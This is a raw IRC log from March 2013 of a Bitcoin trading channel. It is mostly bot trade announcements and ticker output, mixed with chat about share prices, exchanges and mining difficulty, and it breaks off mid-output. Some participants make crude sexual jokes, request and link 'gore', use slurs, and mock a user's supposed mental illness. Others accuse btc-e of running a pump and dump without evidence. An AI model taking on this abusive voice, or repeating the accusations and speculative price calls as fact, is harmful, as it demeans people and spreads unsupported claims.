02:45:39 i'd rather use my dick to stress test a vagina Mar 24 02:45:42 http://www.dtu.dk/upload/cesdyn/common%20figures/course-11702/concretebeam-2.gif Mar 24 02:45:44 i'd go for the vibration test Mar 24 02:46:11 hey mircea u have any more gore Mar 24 02:46:19 umm Mar 24 02:46:35 i tell you sir we here at house of mircea have no gore Mar 24 02:46:37 no gore at all. Mar 24 02:46:42 damn Mar 24 02:47:06 [HAVELOCK] [SDICE] 15 @ 0.53 = 7.95 BTC [+] Mar 24 02:47:13 http://goo.gl/pAKZ5 Mar 24 02:47:21 deep gore Mar 24 02:48:07 [HAVELOCK] [SDICE] 140 @ 0.53 = 74.2 BTC [+] Mar 24 02:48:08 jubilant gore Mar 24 02:48:08 goo.gl/uT3ak Mar 24 02:48:43 [BTCTC] [ASICMINER-PT] 10 @ 0.848 = 8.48 BTC [+] Mar 24 02:48:54 A man's anus is e licked like ice cream. https://www.youtube.com/watch?v=On3etueeGIg Mar 24 02:48:59 I've added Havelock Investments to my spreadsheet tools Mar 24 02:49:18 for self-updating portfolio Mar 24 02:49:34 nice Namworld Mar 24 02:51:06 [HAVELOCK] [VTX] 1 @ 0.64 BTC [+] Mar 24 02:54:04 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Mar 24 03:02:26 [BTCTC] [BTC-BOND] 2 @ 0.00983 = 0.0197 BTC [-] Mar 24 03:02:36 is that spreadsheet available in editable format? Mar 24 03:02:51 [BTCTC] [S.DICE-PT] 20 @ 0.00366 = 0.0732 BTC [-] Mar 24 03:02:53 https://docs.google.com/spreadsheet/pub?key=0AiL-WhkVfu89dGZSOWVSOWwwak9UVi1NM2lxdnU5U0E&output=html Mar 24 03:02:56 yea ^ Mar 24 03:02:58 ;;bc,stats Mar 24 03:03:00 Current Blocks: 227700 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 107 blocks | Next Difficulty In About: 11 hours, 46 minutes, and 47 seconds | Next Difficulty Estimate: 6643433.27569 | Estimated Percent Change: 37.04449 Mar 24 03:04:05 :P Mar 24 03:04:07 WHOA Mar 24 03:04:38 whoa what? Mar 24 03:04:49 difficulty estimate Mar 24 03:04:54 ah Mar 24 03:05:02 been heading there for a few days Mar 24 03:05:04 if it keeps like that diff futures may be profit worthy Mar 24 03:05:17 yep Mar 24 03:05:41 if these helveticoin guys turn out to be legit... Mar 24 03:05:46 could be crazy high Mar 24 03:07:52 ;;ticker Mar 24 03:07:53 BTCUSD ticker | Best bid: 63.60681, Best ask: 63.60682, Bid-ask spread: 0.00001, Last trade: 63.60681, 24 hour volume: 150365.18509571, 24 hour low: 52.34560, 24 hour high: 70.16398, 24 hour vwap: 62.60693 Mar 24 03:08:41 ;;asks 70 Mar 24 03:08:43 There are currently 12199.101 bitcoins offered at or under 70.0 USD, worth 829607.232292 USD in total. | Data vintage: 0.0026 seconds Mar 24 03:10:00 man, getting the amount of each shares, average price and balance on each stock exchange feels neat Mar 24 03:11:32 Namworld: can i get the link again? Mar 24 03:12:31 there's no link Mar 24 03:12:46 I need to republish the updated script Mar 24 03:14:07 ah ok Mar 24 03:14:19 looking forward to trying it out Mar 24 03:19:18 lotta functions in there. Many different APIs Mar 24 03:19:35 and each api has different urls for different kinds of data Mar 24 03:20:14 it integrates with coinbr? Mar 24 03:20:44 i guess not Mar 24 03:21:29 coinbr has no api yet Mar 24 03:21:37 ah i see Mar 24 03:23:57 !r unbalanced Mar 24 03:25:30 https://bitcointalk.org/index.php?topic=140427.0 Mar 24 03:25:36 Here it is, v0.3 Mar 24 03:25:52 yeah, coinbr/Bitfunder don't have API yet so I haven't included that Mar 24 03:27:09 iirc, you had something for options too? Mar 24 03:27:24 yeah Mar 24 03:27:24 very cool... Mar 24 03:27:38 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc#gid=6 Mar 24 03:27:43 For options Mar 24 03:28:08 cool! i tried and partially succeeded to import mpex option prices into gdoc, but felt like terrible hack **** BEGIN LOGGING AT Sun Mar 24 10:18:09 2013 Mar 24 10:19:02 [HAVELOCK] [SDICE] 7 @ 0.53 = 3.71 BTC [+] Mar 24 10:24:02 [HAVELOCK] [VTX] 1 @ 0.711 BTC [+] Mar 24 10:24:49 VTX doing so well I can hardly believe it. Mar 24 10:31:01 [HAVELOCK] [VTX] 2 @ 0.74899 = 1.498 BTC [+] Mar 24 10:34:02 [HAVELOCK] [VTX] 1 @ 0.74899 BTC [+] Mar 24 10:46:47 yawn Mar 24 10:46:50 ;;ticker Mar 24 10:46:50 BTCUSD ticker | Best bid: 67.10000, Best ask: 67.10001, Bid-ask spread: 0.00001, Last trade: 67.10000, 24 hour volume: 116721.98905975, 24 hour low: 52.34560, 24 hour high: 69.50000, 24 hour vwap: 62.24099 Mar 24 11:11:37 [MPEX] [S.MPOE] 1300 @ 0.00066958 = 0.8705 BTC [+] Mar 24 11:11:37 [MPEX] [S.MPOE] 1900 @ 0.00066957 = 1.2722 BTC [-] Mar 24 11:18:21 ;;ticker Mar 24 11:18:21 BTCUSD ticker | Best bid: 67.22003, Best ask: 67.75000, Bid-ask spread: 0.52997, Last trade: 67.22002, 24 hour volume: 93650.08079424, 24 hour low: 55.00000, 24 hour high: 69.50000, 24 hour vwap: 64.22593 Mar 24 11:23:04 http://i.imgur.com/Zfbq2lL.jpg Mar 24 11:23:37 haha sweet Mar 24 11:26:03 [HAVELOCK] [VTX] 1 @ 0.749 BTC [+] Mar 24 11:30:10 Wow Mar 24 11:30:12 VTX Mar 24 11:30:53 aye, so? Mar 24 11:31:15 it was 0.39 when it launched Mar 24 11:31:27 this is becoming a pattern. new ipo, goes to 2x, fades then Mar 24 11:31:57 i made the wrong call about vtx, didnt think they were worth 3 mil. Mar 24 11:32:18 Actually, assets on Havelock seem to hover around or under 10% per year Mar 24 11:32:22 !ticker havelock vtc Mar 24 11:32:23 grrr Mar 24 11:32:23 Are you sure you have no tobacco? Mar 24 11:32:25 !ticker havelock vtx Mar 24 11:32:27 [HAVELOCK:VTX] 1D: 0.57099998 / 0.62809414 / 0.74900000 (283 shares, 177.75064253 BTC), 7D: 0.38280000 / 0.40438482 / 0.74900000 (10630 shares, 4298.61068602 BTC), 30D: 0.38280000 / 0.40438482 / 0.74900000 (10630 shares, 4298.61068602 BTC) Mar 24 11:32:54 and cavirtex charges 0.5-3% depending on volume. Mar 24 11:32:58 if you look at averages, the upleg is very weak still Mar 24 11:34:54 https://bitcointalk.org/index.php?topic=157377 Mar 24 11:36:11 oh wow Mar 24 11:36:16 and has at least 7000 BTC traded weekly. Let's say an average of 2% in fees taken and that's 140 BTC, divided by 100k shares for 0.0014 weekly per share. x52 weeks = 0.0728 BTC yearly Mar 24 11:36:35 At 10% yearly, VTX would be worth 0.72 BTC per share Mar 24 11:36:45 So I'm not really impressed. Mar 24 11:37:12 10% a year in dividends is really good for a stock.. plus, the price appreciation Mar 24 11:37:14 and growth Mar 24 11:37:30 assuming coinlab doesnt squish them Mar 24 11:37:49 coinlab fails... hard Mar 24 11:38:17 just like MtGox, unsurprisingly. Mar 24 11:38:32 Cavirtex is very good for the canadian market. Mar 24 11:40:06 So that malaysian guy wants to use BTC to pass customs Mar 24 11:40:19 well, we dont know if hes malasian Mar 24 11:40:21 but 4M Mar 24 11:40:39 yeah, if they play right with the capital they got in ipo Mar 24 11:40:45 they could become a force in the na market. Mar 24 11:40:51 that will be valuavble mid term. Mar 24 11:41:09 I wonder if they'd expend to the US Mar 24 11:41:34 But the service is top notch and good options for deposit/withdrawals. Mar 24 11:42:04 You have to provide identification papers tho to benefit from all they offer. Mar 24 11:43:09 the only catch here is for their service to STAY top notch. Mar 24 11:43:18 here's my idea : they have say 10k bank transfer limit. Mar 24 11:43:21 random number. Mar 24 11:43:33 as long as their trade grows from 1k to 5k to 8k it all seems top notch and scaling well. Mar 24 11:43:41 once they go to 15k its suddenly MtGox hell. Mar 24 11:44:06 eh Mar 24 11:44:47 Still, if it goes slow because of trading volume, I would complain of service quality but not dividends. Mar 24 11:46:19 Ah, sad I didn't have more funds for that IPO Mar 24 11:46:41 thing is, the share in a company doing X is worth Y Mar 24 11:46:56 if company starts doing W instead.... no Y. maybe 0.5 Y, maybe 0.1 Y maybe 0 Y Mar 24 11:47:05 i wouldn't buy mtgox shares atm, i'd sell them short to all hell. Mar 24 11:47:29 Yeah Mar 24 11:48:02 [HAVELOCK] [VTX] 1 @ 0.747 BTC [-] Mar 24 11:50:30 [MPEX] [S.MPOE] 1300 @ 0.00067969 = 0.8836 BTC [+] Mar 24 11:50:32 [MPEX] [S.MPOE] 2200 @ 0.0006797 = 1.4953 BTC [+] Mar 24 11:53:40 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.26803985 = 268.0399 BTC [-] Mar 24 11:54:02 [HAVELOCK] [VTX] 2 @ 0.74554357 = 1.4911 BTC [-] Mar 24 11:54:33 aha! covering eh ? Mar 24 11:55:02 [HAVELOCK] [VTX] 3 @ 0.731 = 2.193 BTC [-] Mar 24 11:55:32 Looks like getting those calls was a good idea. Mar 24 11:56:00 it was a purchase... Mar 24 11:56:02 [MPEX] [O.BTCUSD.P750T] 10 @ 0.1607531 = 1.6075 BTC [-] Mar 24 11:56:06 Looks like that's not covering Mar 24 11:56:15 i thought it was a short on those open earlier Mar 24 11:56:24 like a couple days ago Mar 24 11:57:20 [MPEX] [S.BBET] 500 @ 0.00201401 = 1.007 BTC [+] Mar 24 12:02:23 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27075717 = 270.7572 BTC [+] Mar 24 12:12:22 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27085926 = 270.8593 BTC [+] Mar 24 12:22:29 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27083304 = 270.833 BTC [-] Mar 24 12:30:36 [BTCTC] [S.MPOE-PT] 1 @ 0.000719 BTC [+] Mar 24 12:30:50 !last h vtx Mar 24 12:30:50 Last trade for VTX on HAVELOCK was at 0.731 BTC [-] Mar 24 12:31:04 !last m s.dice Mar 24 12:31:05 Last trade for S.DICE on MPEX was at 0.00406127 BTC [-] Mar 24 12:31:24 ;;ticker Mar 24 12:31:25 BTCUSD ticker | Best bid: 68.03000, Best ask: 68.38000, Bid-ask spread: 0.35000, Last trade: 68.02002, 24 hour volume: 75739.57028674, 24 hour low: 60.31012, 24 hour high: 69.50000, 24 hour vwap: 64.96990 Mar 24 12:32:25 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27093498 = 270.935 BTC [+] Mar 24 12:33:12 "24 hour volume: 75739.57028674" x 68 = 5M$ seems legit Mar 24 12:33:45 lol wut ? Mar 24 12:34:49 Totally is, why wouldn't it? Mar 24 12:34:49 i read this wrong ? 75K BTC trade in the last 24h ? Mar 24 12:35:01 yeah Mar 24 12:35:08 GOOD :) Mar 24 12:35:09 for the second part Mar 24 12:35:23 not 68$ ? Mar 24 12:35:45 redditor wants to know "How do keep your wallet on your computer synced with your wallet on your mobile?" Mar 24 12:35:46 no, "75K BTC trade in the last 24h ?" Mar 24 12:35:49 yeah to that Mar 24 12:35:55 it's great that more people are into bitcoin Mar 24 12:35:59 it's unfortunate they're from reddit. Mar 24 12:36:22 redditors are insanely generous Mar 24 12:36:23 I sense coins flowing my way... Mar 24 12:36:29 this one dude gave like 350 BTC free Mar 24 12:36:40 Odd Mar 24 12:36:58 "That's not very useful is it? Mar 24 12:36:58 Say I have most of my money at home in my computer. I am on the road without access to it and I need to spend some bitcoins. Mar 24 12:36:58 Ooops I am out of luck. All my money is at home and I have no way to get at it." Mar 24 12:37:00 totally. Mar 24 12:37:23 oh and i accidentally wore shirt backwards, according to some asian culture Mar 24 12:37:28 its a sign of insanely good luck Mar 24 12:37:33 gee. i wonder what that is Mar 24 12:38:16 maybw you get shat on by a bird Mar 24 12:38:30 already happened Mar 24 12:39:01 id prefer a more obvious sign of luck Mar 24 12:40:05 maybe you get shat on by a girl. Mar 24 12:40:45 lol what is this now? Mar 24 12:41:08 i see if i go away for a weekend when i come back all is normal:) Mar 24 12:41:28 we were discussing finance. Mar 24 12:41:50 i have no doubt in my mind that you really where Mar 24 12:42:08 anyone get any deals in that flash crash to 52.31? Mar 24 12:42:27 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27117008 = 271.1701 BTC [+] Mar 24 12:42:30 we got an enterainment deal.. those bears deserved it Mar 24 12:42:48 bear trap :) Mar 24 12:43:07 it was too risky selling at the top Mar 24 12:43:10 yeah Mar 24 12:45:10 ;;ticker Mar 24 12:45:11 BTCUSD ticker | Best bid: 68.03002, Best ask: 68.37999, Bid-ask spread: 0.34997, Last trade: 68.03002, 24 hour volume: 73431.39868107, 24 hour low: 60.31012, 24 hour high: 69.50000, 24 hour vwap: 64.99730 Mar 24 12:45:18 not too bad Mar 24 12:46:03 proudhon called it a downtrend.. so the opposite happened Mar 24 12:46:05 we owe him Mar 24 12:46:39 he should get an award for consistently failing his calls Mar 24 12:47:37 well when i saw 52 i was wondering if 32 would get hit Mar 24 12:47:52 68 on a sunday, damn... i wonder about next week! Mar 24 12:48:05 61.95 was absolute 24h vwap bottom Mar 24 12:49:25 http://stats.grok.se/en/latest90/bitcoin Mar 24 12:49:47 wow Mar 24 12:49:50 holy shit Mar 24 12:49:50 that is bullish Mar 24 12:50:33 that flash crash.. i speculate its just a few big sellers, then noobs jumped in Mar 24 12:50:56 learned an expensive lesson. and bought back at a higher price Mar 24 12:51:20 what kind of dump volume would cause such a flash crash? Mar 24 12:51:36 10-20k Mar 24 12:52:03 hows ltc doing Chaang-Noi Mar 24 12:52:21 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27114431 = 271.1443 BTC [-] Mar 24 12:52:43 well at least I profited :) Mar 24 12:52:53 kako its over .008 Mar 24 12:53:20 i dont understand NVC Mar 24 12:53:29 why is it so high? Mar 24 12:53:31 NVC is a ppcoin clone Mar 24 12:53:39 yeah but why the value?? Mar 24 12:53:43 becasue it was premined and they got the difficulty way high Mar 24 12:53:48 pump and dump Mar 24 12:54:03 and btc-e tolerates this? Mar 24 12:54:06 when you premine the shit out of a coin like that its not hard to keep it up Mar 24 12:54:12 btc-e is the people doing it Mar 24 12:54:33 they got paid like 300000 nvc before it evengot listed Mar 24 12:54:42 btce people are retards Mar 24 12:54:47 bitstamp people are retards Mar 24 12:54:48 mtgox Mar 24 12:54:50 on wait Mar 24 12:54:54 im just gonna stop. Mar 24 12:55:07 on=oh Mar 24 12:55:53 aparently in 2011 and 2012 all the idiots thoguht they are cool for a bitcoin biz Mar 24 12:55:58 and now you have the results Mar 24 12:56:00 "Just checked the queue, there are 5500 accounts pending verification at this very moment." at gox that is damn bullish Mar 24 12:58:55 4300 last time i checked.. Mar 24 12:59:07 ;;goxlag Mar 24 12:59:08 0.092316 seconds Mar 24 12:59:11 ;;goxverificationlag Mar 24 12:59:12 Error: "goxverificationlag" is not a valid command. Mar 24 12:59:14 eh Mar 24 12:59:21 6500 next week ? @80$ ? Mar 24 12:59:34 ;;goxlag Mar 24 12:59:35 0 seconds Mar 24 12:59:46 ". Since we have a limited number of available chips for the first batch, I will not, in good conscience, be taking a large swath of them." Mar 24 12:59:50 well a bunch of money is still puring in Mar 24 12:59:51 according to josh Mar 24 12:59:53 4847647.152065606 Mar 24 12:59:58 its the sellers market Mar 24 13:00:17 Next difficulty estimate | 6678297.40921 based on data since last change | 7641687.50681 based on data for last three days Mar 24 13:00:27 bfl must be the heist of the century Mar 24 13:00:39 So apparently if bfl gets their shit together, they will keep some mining rigs for themselves? Mar 24 13:01:03 im sure they ordered first... Mar 24 13:01:15 i'll do the same if i was running a ascis factory Mar 24 13:01:28 not you ? Mar 24 13:02:23 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.2703313 = 270.3313 BTC [-] Mar 24 13:04:53 i hope this Ddos attak on SwC is from a oncurrent Mar 24 13:04:53 Mar 24 13:05:08 *concurrent Mar 24 13:05:08 Mar 24 13:06:21 SatoshiPoker ! Erik if you're there, please make that real Mar 24 13:09:26 [BTCTC] [S.MPOE-PT] 30 @ 0.000674 = 0.0202 BTC [-] Mar 24 13:11:04 [BTCTC] [S.MPOE-PT] 17 @ 0.00066 = 0.0112 BTC [-] Mar 24 13:11:14 [BTCTC] [S.MPOE-PT] 60 @ 0.000657 = 0.0394 BTC [-] Mar 24 13:11:16 [BTCTC] [S.MPOE-PT] 25 @ 0.00065 = 0.0163 BTC [-] Mar 24 13:11:18 [BTCTC] [S.MPOE-PT] 10 @ 0.00061 = 0.0061 BTC [-] Mar 24 13:13:54 gox > 2. Order lag is simply linked to large/unusual activity. We are working on a new trade engine that will reduce lag for large activity (this is our current main priority alongside keeping things secure and ensuring our legal compliance). Note that even if the engine is lagging, orders are guaranteed to be executed in the same order they were placed. Mar 24 13:15:51 ;;bc,stats Mar 24 13:15:53 Current Blocks: 227801 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 6 blocks | Next Difficulty In About: 38 minutes and 34 seconds | Next Difficulty Estimate: 6692199.0965 | Estimated Percent Change: 38.05046 Mar 24 13:21:03 [MPEX] [S.MPOE] 4180 @ 0.0006698 = 2.7998 BTC [-] Mar 24 13:22:58 [BTCTC] [ASICMINER-PT] 2 @ 0.843995 = 1.688 BTC [-] Mar 24 13:25:48 [BTCTC] [S.MPOE-PT] 245 @ 0.0006 = 0.147 BTC [-] Mar 24 13:33:19 [BTCTC] [SYNERGY] 9 @ 0.007 = 0.063 BTC [-] Mar 24 13:39:57 ;;ticker Mar 24 13:40:05 BTCUSD ticker | Best bid: 67.71234, Best ask: 67.97000, Bid-ask spread: 0.25766, Last trade: 67.71234, 24 hour volume: 67103.69556708, 24 hour low: 60.31012, 24 hour high: 69.50000, 24 hour vwap: 64.99679 Mar 24 13:42:06 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27074638 = 270.7464 BTC [+] Mar 24 13:44:24 [BTCTC] [COGNITIVE] 1 @ 0.131 BTC [-] Mar 24 13:44:26 [BTCTC] [COGNITIVE] 10 @ 0.1306 = 1.306 BTC [-] Mar 24 13:44:28 [BTCTC] [COGNITIVE] 5 @ 0.13 = 0.65 BTC [-] Mar 24 13:47:18 http://tf2shop.net/ Mar 24 13:47:24 ah the old market. Mar 24 13:51:41 [BTCTC] [ASICMINER-PT] 2 @ 0.843995 = 1.688 BTC [-] Mar 24 13:55:56 https://bitcointalk.org/index.php?topic=102333.msg1666843#msg1666843 Mar 24 13:56:00 reminds me of nefario Mar 24 13:56:10 even the avatar Mar 24 14:05:07 [BTCTC] [SYNERGY] 1 @ 0.0099 BTC [+] Mar 24 14:06:28 that tie is awful Mar 24 14:06:40 [BTCTC] [ASICMINER-PT] 1 @ 0.843995 BTC [-] Mar 24 14:09:05 and my answer https://bitcointalk.org/index.php?topic=102333.msg1667228#msg1667228 Mar 24 14:11:02 [HAVELOCK] [VTX] 4 @ 0.74895 = 2.9958 BTC [+] Mar 24 14:12:41 maybe he invites you in his TV show now :> Mar 24 14:15:16 ;;diff Mar 24 14:15:17 6695826.282596251 Mar 24 14:15:20 Bam Mar 24 14:15:30 he has a tv show ?? Mar 24 14:15:33 urlpls Mar 24 14:16:16 https://bitcointalk.org/index.php?topic=155098.msg1660563#msg1660563 Mar 24 14:16:25 avalon still breaks even in 5 days Mar 24 14:16:42 honestly, ill get my shit... the diff might be like 10m Mar 24 14:17:21 lol that guy Mar 24 14:17:39 "i can make pancakes - so i must be able to use bitcoin" Mar 24 14:22:07 http://vimeo.com/11018684 Mar 24 14:22:18 oo ty Mar 24 14:22:26 mental masturbation awaits Mar 24 14:22:31 lol Mar 24 14:23:10 we'll see single digits soon Mar 24 14:23:31 1 mBTC = $1 parity event Mar 24 14:24:54 so proudhon was right all the time Mar 24 14:26:38 [BTCTC] [BTC-MINING] 3 @ 0.021 = 0.063 BTC [-] Mar 24 14:27:13 ;;ticker Mar 24 14:27:14 BTCUSD ticker | Best bid: 67.22000, Best ask: 67.22001, Bid-ask spread: 0.00001, Last trade: 67.22000, 24 hour volume: 64537.66062626, 24 hour low: 60.31012, 24 hour high: 69.50000, 24 hour vwap: 65.00382 Mar 24 14:38:08 [BTCTC] [S.MPOE-PT] 45 @ 0.0006 = 0.027 BTC [-] Mar 24 14:39:24 lmao Mar 24 14:40:39 kakobrekla that's like inverse intern syndrome Mar 24 14:40:55 instead of thinking he's suffering from every entry in the nosology book, like normal interns Mar 24 14:41:01 bitcoin noobs think I am. Mar 24 14:48:02 [MPEX] [S.MPOE] 1300 @ 0.00066987 = 0.8708 BTC [+] Mar 24 14:48:09 [MPEX] [S.MPOE] 820 @ 0.00066986 = 0.5493 BTC [-] Mar 24 14:48:11 [MPEX] [S.MPOE] 150 @ 0.00066957 = 0.1004 BTC [-] Mar 24 14:48:13 [MPEX] [S.MPOE] 1630 @ 0.00066656 = 1.0865 BTC [-] Mar 24 14:52:09 [BTCTC] [ASICMINER-PT] 9 @ 0.843994 = 7.5959 BTC [-] Mar 24 15:03:44 !ticker s.dice Mar 24 15:03:45 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Mar 24 15:17:53 [MPEX] [S.MPOE] 8370 @ 0.00066656 = 5.5791 BTC [-] Mar 24 15:17:55 [MPEX] [S.MPOE] 7280 @ 0.00066655 = 4.8525 BTC [-] Mar 24 15:34:24 [BTCTC] [S.MPOE-PT] 2 @ 0.0006 = 0.0012 BTC [-] Mar 24 15:38:43 mircea_popescu: When will MPOE bot be upgraded to v2 Mar 24 15:38:56 mircea_popescu: When will there be a shareholders meeting? Mar 24 15:39:07 uh Mar 24 15:39:16 mircea_popescu: Also y u no hold press confrences? Mar 24 15:39:20 I DEMAND ANSWERS! Mar 24 15:39:21 lol Mar 24 15:39:24 what's this then lol Mar 24 15:40:30 !ticker m S.DICE Mar 24 15:40:31 [MPEX:S.DICE] 1D: 0.00406127 / 0.00410987 / 0.0044444 (2418 shares, 9.94 BTC), 7D: 0.00320003 / 0.00435464 / 0.005598 (288838 shares, 1,257.79 BTC), 30D: 0.00300001 / 0.00544752 / 0.00638999 (1286528 shares, 7,008.39 BTC) Mar 24 15:40:35 !ticker m ^OIX Mar 24 15:40:36 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.26732239 / 68.48072218 / 69.69362193 (24630 shares, 6,346.18 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 24 15:44:32 [MPEX] [S.MPOE] 21992 @ 0.00066655 = 14.6588 BTC [-] Mar 24 15:44:34 [MPEX] [S.MPOE] 3919 @ 0.00066079 = 2.5896 BTC [-] Mar 24 15:45:47 Must be dividends paying week for the price to drop that low. Mar 24 15:46:15 haha it is Mar 24 15:46:22 friday. Mar 24 15:46:23 will there be dividends for dive this month? Mar 24 15:46:31 sice Mar 24 15:46:44 wow... s. dice Mar 24 15:47:22 no one will know until friday Mar 24 15:47:26 How MPOE bot faired Mar 24 15:47:31 are they neg now? Mar 24 15:47:34 I hope the bondholders have hedged their bet Mar 24 15:53:47 [MPEX] [S.MPOE] 3381 @ 0.00066079 = 2.2341 BTC [-] Mar 24 15:53:49 [MPEX] [S.MPOE] 10969 @ 0.00065768 = 7.2141 BTC [-] Mar 24 15:54:52 [MPEX] [S.DICE] 225 @ 0.00439999 = 0.99 BTC [+] Mar 24 16:06:01 https://bitcointalk.org/index.php?topic=157360.msg1667375#msg1667375 Mar 24 16:06:03 lol poor tux. Mar 24 16:07:54 [BTCTC] [ASICMINER-PT] 1 @ 0.825 BTC [-] Mar 24 16:07:56 [BTCTC] [ASICMINER-PT] 5 @ 0.822 = 4.11 BTC [-] Mar 24 16:08:53 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [-] Mar 24 16:18:02 [HAVELOCK] [SDICE] 1 @ 0.52999999 BTC [-] Mar 24 16:19:04 [MPEX] [S.MPOE] 2700 @ 0.00066236 = 1.7884 BTC [+] Mar 24 16:26:01 [HAVELOCK] [SDICE] 4 @ 0.53 = 2.12 BTC [+] Mar 24 16:30:33 [MPEX] [S.DICE] 2148 @ 0.004 = 8.592 BTC [-] Mar 24 16:37:14 [MPEX] [S.DICE] 10000 @ 0.004 = 40 BTC [-] Mar 24 17:09:06 [BTCTC] [BTC-BOND] 6 @ 0.009899 = 0.0594 BTC [+] Mar 24 17:09:39 [BTCTC] [GSDPT] 1 @ 0.0041 BTC [-] Mar 24 17:09:42 [BTCTC] [GSDPT] 15 @ 0.00403 = 0.0605 BTC [-] Mar 24 17:09:44 [BTCTC] [GSDPT] 18 @ 0.00402 = 0.0724 BTC [-] Mar 24 17:25:44 [BTCTC] [GSDPT] 7 @ 0.00402 = 0.0281 BTC [-] Mar 24 17:25:46 [BTCTC] [GSDPT] 149 @ 0.00402 = 0.599 BTC [-] Mar 24 17:26:55 [BTCTC] [S.MPOE-PT] 215 @ 0.000585 = 0.1258 BTC [-] Mar 24 17:31:20 [BTCTC] [ASICMINER-PT] 1 @ 0.821 BTC [+] Mar 24 17:32:13 [BTCTC] [S.MPOE-PT] 20034 @ 0.0006 = 12.0204 BTC [+] Mar 24 17:32:38 [BTCTC] [ASICMINER-PT] 5 @ 0.821 = 4.105 BTC [+] Mar 24 17:32:40 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [-] Mar 24 17:32:42 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [-] Mar 24 17:39:01 [HAVELOCK] [SDICE] 9 @ 0.52 = 4.68 BTC [-] Mar 24 17:44:01 [HAVELOCK] [VTX] 4 @ 0.74879999 = 2.9952 BTC [-] Mar 24 17:44:52 ;;tslb Mar 24 17:44:54 Time since last block: 1 minute and 14 seconds Mar 24 17:44:57 ;;bc,stats Mar 24 17:45:00 [HAVELOCK] [VTX] 1 @ 0.7488 BTC [+] Mar 24 17:45:04 Current Blocks: 227833 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1990 blocks | Next Difficulty In About: 1 week, 2 days, 3 hours, 4 minutes, and 57 seconds | Next Difficulty Estimate: 7798057.04105 | Estimated Percent Change: 16.46146 Mar 24 17:48:43 [MPEX] [S.MPOE] 100 @ 0.00067516 = 0.0675 BTC [+] Mar 24 17:54:28 ;;ticker Mar 24 17:54:29 BTCUSD ticker | Best bid: 69.22001, Best ask: 69.89880, Bid-ask spread: 0.67879, Last trade: 69.15100, 24 hour volume: 53590.65591553, 24 hour low: 60.31012, 24 hour high: 70.80000, 24 hour vwap: 65.02820 Mar 24 17:54:34 nice Mar 24 17:54:45 ;;asks 75 Mar 24 17:54:49 There are currently 13727.664 bitcoins offered at or under 75.0 USD, worth 1004783.82347 USD in total. | Data vintage: 0.0025 seconds Mar 24 17:55:11 ;;bids 65 Mar 24 17:55:11 There are currently 5320.6814 bitcoins demanded at or over 65.0 USD, worth 356090.217043 USD in total. | Data vintage: 21.7412 seconds Mar 24 18:06:01 [HAVELOCK] [VTX] 1 @ 0.7487 BTC [-] Mar 24 18:06:02 [HAVELOCK] [VTX] 1 @ 0.7488 BTC [+] Mar 24 18:07:01 [HAVELOCK] [SDICE] 2 @ 0.53 = 1.06 BTC [+] Mar 24 18:08:42 what the fuck Mar 24 18:08:45 ANOTHER dividend Mar 24 18:09:06 go asicminer go! Mar 24 18:10:27 probly the bonus one to fulfill their obligations Mar 24 18:10:37 that friedcat mentioned Mar 24 18:11:01 [HAVELOCK] [SDICE] 1 @ 0.53 BTC [+] Mar 24 18:11:09 ahh Mar 24 18:11:31 then on Wed all shares will split divs Mar 24 18:12:01 [HAVELOCK] [VTX] 1 @ 0.7487 BTC [-] Mar 24 18:13:40 it's funny sometimes Havelock shows - when it should be +, somehting to do with how matching orders don't get filled immediately there I bet Mar 24 18:14:01 [HAVELOCK] [VTX] 1 @ 0.7488 BTC [+] Mar 24 18:17:49 [MPEX] [S.MPOE] 731 @ 0.00065768 = 0.4808 BTC [-] Mar 24 18:17:51 [MPEX] [S.MPOE] 5600 @ 0.00065653 = 3.6766 BTC [-] Mar 24 18:32:01 [HAVELOCK] [SDICE] 9 @ 0.53 = 4.77 BTC [+] Mar 24 18:36:23 [MPEX] [S.MPOE] 5891 @ 0.00065652 = 3.8676 BTC [-] Mar 24 18:36:24 [MPEX] [S.MPOE] 5809 @ 0.00067509 = 3.9216 BTC [+] Mar 24 18:47:36 [MPEX] [S.MPOE] 8926 @ 0.00065583 = 5.8539 BTC [-] Mar 24 18:54:32 ;;goxlag Mar 24 18:54:33 88.704998 seconds Mar 24 19:01:31 [BTCTC] [PAJKA.BOND] 1 @ 0.1097 BTC [+] Mar 24 19:05:27 [MPEX] [S.DICE] 500 @ 0.0043999 = 2.2 BTC [+] Mar 24 19:06:30 ;;goxlag Mar 24 19:06:31 0 seconds Mar 24 19:09:02 ;;bc,stats Mar 24 19:09:04 Current Blocks: 227842 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1981 blocks | Next Difficulty In About: 1 week, 2 days, 1 hour, 5 minutes, and 45 seconds | Next Difficulty Estimate: 8074724.41934 | Estimated Percent Change: 20.5934 Mar 24 19:09:06 ;;ticker Mar 24 19:09:06 BTCUSD ticker | Best bid: 68.50001, Best ask: 68.51000, Bid-ask spread: 0.00999, Last trade: 68.51000, 24 hour volume: 52567.32160321, 24 hour low: 60.31012, 24 hour high: 70.80000, 24 hour vwap: 65.13060 Mar 24 19:17:22 mircea_popescu: How's your NPD going today? Mar 24 19:17:37 Have you been staying away from mirrors like the doc said to? Mar 24 19:18:47 $depth dice Mar 24 19:18:48 smickles: S.DICE Bids: ['2000 @ 0.004004', '352 @ 0.004', '1512 @ 0.0038512', '1000 @ 